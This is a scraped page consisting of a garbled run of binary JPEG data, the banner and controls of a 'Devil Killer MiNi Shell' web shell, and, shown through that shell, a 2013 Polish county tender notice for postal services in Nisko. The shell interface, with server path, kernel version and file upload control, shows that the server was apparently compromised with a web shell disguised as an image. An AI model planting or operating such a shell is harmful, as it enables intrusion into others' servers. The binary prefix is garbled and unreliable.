JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130826/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130826/343558-N-2013.html

<p class="kh_header"><b>Nisko: Świadczenie usług pocztowych na potrzeby Starostwa Powiatowego w Nisku.</b><br>
<b>Numer ogłoszenia: 343558 - 2013; data zamieszczenia: 26.08.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Niżański , Pl. Wolności 2, 37-400 Nisko, woj. podkarpackie, tel. 015 8412057, faks 015 8412700.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-nisko.pl, poczta@powiat-nisko.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług pocztowych na potrzeby Starostwa Powiatowego w Nisku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:  Świadczenie usług pocztowych na potrzeby Starostwa Powiatowego w Nisku.
Przedmiotem zamówienia jest świadczenie usług pocztowych w obrocie krajowym
i zagranicznym na potrzeby Starostwa Powiatowego w Nisku w zakresie przyjmowania, sortowania, przemieszczania, doręczania przesyłek pocztowych i ich ewentualnych zwrotów, w rozumieniu ustawy Prawo pocztowe z dnia 23 listopada 2012 r. (Dz. U. 2012 r. poz. 1529).
Usługi będące przedmiotem zamówienia będą świadczone zgodnie z przepisami powszechnie obowiązującego prawa, w szczególności ustawy z dnia 23 listopada Prawo pocztowe (Dz. U. 2012 r. poz. 1529) oraz aktów wykonawczych wydanych na jej podstawie.
Powiat Niżański jako jednostka sektora finansów publicznych i jednostka administracji publicznej, działa w ramach obowiązującego prawa. Zamawiający przewiduje, że przesyłki objęte przedmiotem zamówienia, a w szczególności polecone ze zwrotnym potwierdzeniem odbioru w przeważającej mierze będą zawierały dokumenty w sprawach prowadzonych w trybie ustawy z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego (Dz. U. z 2013 r. poz. 267), który wymaga, aby dla zachowania odpowiednich terminów w zakresie doręczeń, miały zastosowanie przepisy zawarte w powołanej ustawie (Kodeks postępowania administracyjnego - art. 57 § 5 pkt 2). Zamawiający wymaga, aby zgodnie z art. 17 ustawy Prawo pocztowe, potwierdzenia nadania przesyłek rejestrowanych miały moc dokumentów urzędowych.
Od Wykonawcy wymaga się spełnienia następujących warunków w zakresie świadczenia usług:
przyjmowania co najmniej raz dziennie (od poniedziałku do piątku) w dni robocze przesyłek od upoważnionego pracownika Zamawiającego w placówce pocztowej wyznaczonej przez Wykonawcę, znajdującej się najbliżej siedziby Zamawiającego  w mieście Nisku. Na tych samych zasadach będzie się odbywał odbiór przez Zamawiającego zwrotnych potwierdzeń odbioru i zwrotów niedoręczonych przesyłek pocztowych.
W przypadku gdy siedziba Wykonawcy znajduje się poza terenem miasta Nisko, Wykonawca zobowiązany będzie:
do odbioru raz dziennie przesyłek przygotowanych do wyekspediowania, z Biura Obsługi Interesanta pok. Nr 1, zlokalizowanej w siedzibie Zamawiającego, 37-400 Nisko, Pl. Wolności 2 od poniedziałku do piątku w dni robocze w godzinach od 14:00-15:00,
odbioru przesyłek dokonywać będzie upoważniony przedstawiciel Wykonawcy po okazaniu stosownego upoważnienia,
dostarczanie do siedziby Zamawiającego zwrotnych potwierdzeń odbioru
i zwrotów niedoręczonych przesyłek pocztowych. 
Odbiór przesyłek przygotowanych do wyekspediowania, a następnie nadania w wyznaczonej placówce nadawczej będzie każdorazowo dokumentowany przez Wykonawcę pieczęcią, podpisem i datą w zestawieniu przesyłek (dla przesyłek rejestrowanych) oraz na zestawieniu ilościowym przesyłek wg poszczególnych kategorii wagowych (dla przesyłek nierejestrowanych).
dostarczania przesyłek do adresatów w kopertach oryginalnych przekazanych przez Zamawiającego,
dostarczania nadanych przez Zamawiającego przesyłek listowych i paczek do każdego wskazanego miejsca w kraju i zagranicą,
dostarczania przesyłek zgodnie z obowiązującymi w dniu doręczenia przepisami, a w szczególności ustawy Kodeks postępowania administracyjnego,                                     
zapewnienie wszelkich oznaczeń przesyłek rejestrowanych i najszybszej kategorii.
Poprzez przesyłki pocztowe będące przedmiotem zamówienia rozumie się:
przesyłki listowe o wadze do 2 000 g (Gabaryt A i B)
przesyłki nierejestrowane nie będące przesyłkami najszybszej kategorii (zwykłe),            
przesyłki nierejestrowane najszybszej kategorii (priorytetowe),
przesyłki rejestrowane nie będące przesyłkami najszybszej kategorii, przemieszczane i doręczane w sposób zabezpieczający ją przed utratą, ubytkiem zawartości lub uszkodzeniem (polecone), 
przesyłki rejestrowane najszybszej kategorii, przemieszczane i doręczane w sposób zabezpieczający ją przed utratą, ubytkiem zawartości lub uszkodzeniem (polecone priorytetowe), 
zwrotne potwierdzenia odbioru - potwierdzenie odbioru przesyłki rejestrowanej poleconej i poleconej priorytetowej nadanych ze zwrotnym potwierdzeniem odbioru.
Gabaryt A to przesyłka o wymiarach:
Minimum wymiary strony adresowej nie mogą być mniejsze niż 90 x 140 mm, Maksimum żaden z wymiarów nie może przekroczyć wysokości 20 mm,  szerokości 230 mm.
Gabaryt B to przesyłka o wymiarach:
Minimum jeśli choć jeden z wymiarów przekracza wysokość 20 mm lub długość 325 mm lub szerokość 230 mm,
Maksimum suma długości, szerokości i długości nie może być większa niż 900 mm przy czym największy z tych wymiarów ( długość) nie może przekroczyć 600 mm.
paczki pocztowe  o wadze do 10 000 g (Gabaryt A i B) rozumie się:
paczki rejestrowane nie będące paczkami najszybszej kategorii (paczki pocztowe zwykłe) przyjęte za potwierdzeniem nadania lub przyjęte za potwierdzeniem nadania i doręczone za potwierdzeniem odbioru.
Gabaryt A to paczka o wymiarach:
Minimum wymiary strony adresowej nie mogą być mniejsze ni 90 x 140 mm Maksimum - żaden z wymiarów nie może przekroczyć długości 600 mm, szerokości 500 mm i wysokości 300 mm.
Gabaryt B to paczka o wymiarach:
Minimum jeśli choć jeden z wymiarów przekracza długość 600 mm, szerokość 500 mm i wysokość 300 mm
Maksimum suma długości i największego obwodu mierzonego w innym kierunku niż długość 3000 mm, przy czym największy wymiar nie może przekroczyć 1500 mm.
paczki pocztowe o wadze od 10 000 g 15 000 g (Gabaryt A i B) rozumie się:
paczki rejestrowane nie będące paczkami najszybszej kategorii (paczki pocztowe zwykłe) przyjęte za potwierdzeniem nadania lub przyjęte za potwierdzeniem nadania i doręczone za potwierdzeniem odbioru.
Gabaryt A to paczka o wymiarach:
Minimum wymiary strony adresowej nie mogą być mniejsze niż 150 x 200 mm, Maksimum żaden z wymiarów nie może przekroczyć długości 600 mm, szerokość 500 mm, wysokość 300 mm,
Gabaryt B to paczka o wymiarach:
Minimum jeśli choć jeden z wymiarów przekracza długość 600 mm, szerokość 500 mm, wysokość 300 mm,
Maksimum suma długości i największego obwodu mierzonego w innym kierunku niż długość 3000 mm, przy czym największy wymiar nie może przekroczyć 1500 mm.	
Zamawiający zobowiązuje się do umieszczania na stronie adresowej każdej nadawanej przesyłki listowej lub paczki, nazwy odbiorcy wraz z jego adresem (podany jednocześnie w zestawieniu przesyłek dla przesyłek rejestrowanych), określając rodzaj przesyłki (zwykła, polecona, priorytet, czy ze zwrotnym potwierdzeniem odbioru - ZPO) oraz nadruku (pieczątki) zawierającego pełną nazwę i adres Zamawiającego oraz znak opłaty pocztowej.
Zamawiający zobowiązuje się do właściwego przygotowania przesyłek oraz sporządzenia zestawień dla przesyłek, do nadawania przesyłek w stanie uporządkowanym, przez co należy rozumieć:
dla przesyłek rejestrowanych - wpisanie każdej przesyłki do zestawienia przesyłek sporządzanego w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla Wykonawcy w celach rozliczeniowych, a kopia stanowić będzie dla Zamawiającego potwierdzenie nadania danej partii przesyłek,
dla przesyłek  nierejestrowanych - przygotowanie zestawienia ilościowego przesyłek wg poszczególnych kategorii wagowych sporządzanego dla celów rozliczeniowych w dwóch egzemplarzach, z których oryginał będzie przeznaczony dla Wykonawcy  w celach rozliczeniowych, a kopia stanowić będzie dla zamawiającego potwierdzenie nadania danej partii przesyłek.  
Zamawiający będzie przekazywał Wykonawcy przesyłki codziennie w dni robocze od poniedziałku do  piątku, w godzinach od 14 - 15,00 lub Wykonawca odbierał będzie przesyłki przygotowane do wyekspediowania z siedziby Zamawiającego (w przypadku gdy siedziba Wykonawcy znajduje się poza terenem miasta Nisko) a następnie nadania w wyznaczonej placówce nadawczej w dni robocze od poniedziałku do piątku, w godzinach od 14 - 15,00.
Zamawiający jest odpowiedzialny za przygotowanie przesyłek listowych i paczek w stanie umożliwiającym Wykonawcy doręczenie bez ubytku i uszkodzenia do miejsca zgodnie z adresem przeznaczenia.
Nadanie przesyłek objętych przedmiotem zamówienia następować będzie w dniu ich odbioru przez Wykonawcę od Zamawiającego.
Zamawiający będzie korzystał z druków potwierdzenia odbioru dostarczonych nieodpłatnie przez Wykonawcę.
Druki zwrotnego potwierdzenia odbioru na zasadach KPA zapewnia Zamawiający.
Wykonawca będzie doręczał Zamawiającemu pokwitowane przez adresata potwierdzenie odbioru, niezwłocznie po dokonaniu doręczenia przesyłki, nie później jednak, niż w ciągu 7 dni roboczych od dnia doręczenia.
W przypadku nieobecności adresata, przedstawiciel Wykonawcy pozostawia zawiadomienie (pierwsze awizo) o próbie dostarczenia przesyłki, ze wskazaniem gdzie i kiedy można odebrać list lub przesyłkę. Termin do odbioru przesyłki przez adresata wynosi 14 dni roboczych liczonych od dnia następnego po dniu pozostawienia pierwszego awizo, w tym terminie przesyłka jest awizowana dwukrotnie. Po upływie terminu odbioru przesyłka zwracana jest Zamawiającemu wraz z podaniem przyczyny nie odebrania przez adresata.
Orientacyjne ilości i rodzaj przesyłek
Lp.
Rodzaj przesyłki
Waga przesyłki
Pzewidywana ilość szt.
1
2
3
4
Przesyłki krajowe gabaryt A
1
Przesyłki nierejestrowane niebędące przesyłkami najszybszej kategorii (zwykłe)
do 50 g
4500
ponad 50-100 g
90
ponad 100-350 g
30
ponad 350-500 g
0
ponad 500-1000 g
0
ponad 1-2kg
0
2
Przesyłki nierejestrowane najszybszej kategorii (priorytety)
do 50 g
2250
ponad 50-100 g
7
ponad 100-350 g
7
ponad 350-500 g
0
ponad 500-1000 g
0
ponad 1-2kg
0
3
Przesyłki rejestrowane nie najszybszej kategorii (polecone)
do 50 g
25875
ponad 50-100 g
444
ponad 100-350 g
563
ponad 350-500 g
14
ponad 500-1000 g
18
ponad 1-2kg
9
4
Przesyłki rejestrowane najszybszej kategorii (polecone priorytety)
do 50 g
1220
ponad 50-100 g
84
ponad 100-350 g
66
ponad 350-500 g
3
ponad 500-1000 g
0
ponad 1-2kg
0
5
Zwroty przesyłek rejestrowanych
do 50 g
936
ponad 50-100 g
0
ponad 100-350 g
3
6
Paczka pocztowa rejestrowana nie najszybszej kategorii w obrocie krajowym (zwykła)
ponad 500-1000 g
3
ponad 1-2kg
0
ponad 2-5 kg
61
ponad 5-10 kg
3
Przesyłki krajowe gabaryt B
7
Przesyłki nierejestrowane niebędące przesyłkami najszybszej kategorii (zwykłe)
do 50 g
0
ponad 50-100 g
3
ponad 100-350 g
21
ponad 350-500 g
0
ponad 500-1000 g
5
ponad 1-2kg
5
8
Przesyłki nierejestrowane najszybszej kategorii (priorytety)
do 50 g
0
ponad 50-100 g
5
ponad 100-350 g
3
ponad 350-500 g
0
ponad 500-1000 g
0
ponad 1-2kg
0
9
Przesyłki rejestrowane nie najszybszej kategorii (polecone)
do 50 g
0
ponad 50-100 g
48
ponad 100-350 g
286
ponad 350-500 g
43
ponad 500-1000 g
135
ponad 1-2kg
111
10
Przesyłki rejestrowane najszybszej kategorii (polecone priorytety)
do 50 g
0
ponad 50-100 g
16
ponad 100-350 g
54
ponad 350-500 g
12
ponad 500-1000 g
5
ponad 1-2kg
5
11
Paczka pocztowa rejestrowana nie najszybszej kategorii w obrocie krajowym (zwykła)
ponad 1-2 kg
3
ponad 2-5kg
0
ponad 5-10kg
0
ponad 10-15 kg
3
Zwrotne potwierdzenia odbioru
12
Zwrotne potwierdzenie odbioru
26550
Przesyłki zagraniczne
13
Przesyłki rejestrowane nie najszybszej kategorii z poleceniem Europa (polecone)
do 50 g
68
ponad 50-100 g
0
ponad 100-350 g
0
14
Przesyłki rejestrowane najszybszej kategorii wraz z poleceniem Europa (polecone priorytety)
do 50 g
25
ponad 50-100 g
5
ponad 100-350 g
0
15
Przesyłki rejestrowane nie najszybszej kategorii z poleceniem poza  Europą (polecone)
do 50 g
3
ponad 50-100 g
0
ponad 100-350 g
0
16
Przesyłki rejestrowane najszybszej kategorii wraz z poleceniem  poza Europą (polecone priorytety)
do 50 g
14
ponad 50-100 g
0
ponad 100-350 g
0
17
Potwierdzenie odbioru zagranica
106
Przesyłki kurierskie
18
Przesyłki kurierskie
ponad 500-1000 g
5
ponad 1-2 kg
7
ponad 2-5 kg
0
19
Potwierdzenie odbioru  przesyłki kurierskiej
3
Ilości wskazane w tabeli są wielkościami orientacyjnymi, przyjętymi w celu porównania ofert i wyboru najkorzystniejszej oferty. Wykonawcy z którym zamawiający podpisze umowę nie przysługuje roszczenie o realizację usługi w wielkościach podanych  w w.w  tabeli. Ponadto Zamawiający zastrzega sobie prawo do: 
zmian ilościowych w poszczególnych pozycjach usług i zamiennego zastosowania usług zawartych w w.w załączniku,
niewykorzystania limitu określonego w tabeli z prawem do obniżenia wartości  umowy, bez prawa Wykonawcy do zgłoszenia roszczeń z tego tytułu.
Wykonawcy nie przysługuje z tego tytułu prawo do dochodzenia kar, odszkodowań lub innych należności.
Nie wyszczególnione w tabeli stanowiącym formularz cenowy rodzaje przesyłek oraz zwroty będą wyceniane dodatkowo zgodnie z obowiązującym cennikiem Wykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 64.11.00.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż posiada uprawnienia do wykonywania działalności pocztowej, na podstawie wpisu do rejestru operatorów pocztowych, prowadzonego przez Prezesa Urzędu Komunikacji Elektronicznej, zgodnie z art. 6 ustawy z dnia 23 listopada 2012 r. - Prawo pocztowe (Dz. U. z 2012 r. poz. 1529)</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza spełnienie warunku poprzez złożenie	oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza spełnienie warunku poprzez złożenie	oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza spełnienie warunku poprzez złożenie	oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku, Wykonawca potwierdza spełnienie warunku poprzez złożenie	oświadczenia (załącznik nr 2 do SIWZ)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy (załącznik nr 1 wraz z załącznikiem 1a do SIWZ 2. W przypadku gdy Wykonawcę reprezentuje pełnomocnik do oferty winno być załączone pełnomocnictwo posiadające zakres uprawnień i podpisane przez osoby uprawnione do reprezentowania Wykonawcy. Jeżeli w kraju zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów o których mowa w pkt III.4.3.1. Zastępuje się je dokumentem zawierającym oświadczenie, w którym określa się także osoby uprawnione do reprezentacji wykonawcy, złożone przed właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju miejsca zamieszkania osoby lub kraju w którym wykonawca ma siedzibę lub miejsce zamieszkania lub przed notariuszem.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszczalne są następujące przypadki i warunki zmiany umowy:
wystąpienia zdarzeń siły wyższej jako zdarzenia zewnętrznego, niemożliwego do przewidzenia i niemożliwego do zapobieżenia,
zaistnienia okoliczności technicznych, gospodarczych itp.) których nie można było przewidzieć w chwili zawarcia umowy,
strony przewidują możliwość dokonania zmian postanowień umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadku gdy nastąpi zmiana przepisów określających wysokość należnego podatku VAT za usługi pocztowe w czasie trwania niniejszej umowy, Wykonawca zastosuje obowiązujący podatek VAT, co skutkować będzie zmianą cen jednostkowych przesyłek w zakresie odpowiadającym zmianie wysokości stawki obowiązującego podatku VAT,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.powiat-nisko.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Nisku, Plac Wolności 2,  37 - 400 Nisko - Wydział Gospodarki Mieniem Powiatu..</p>
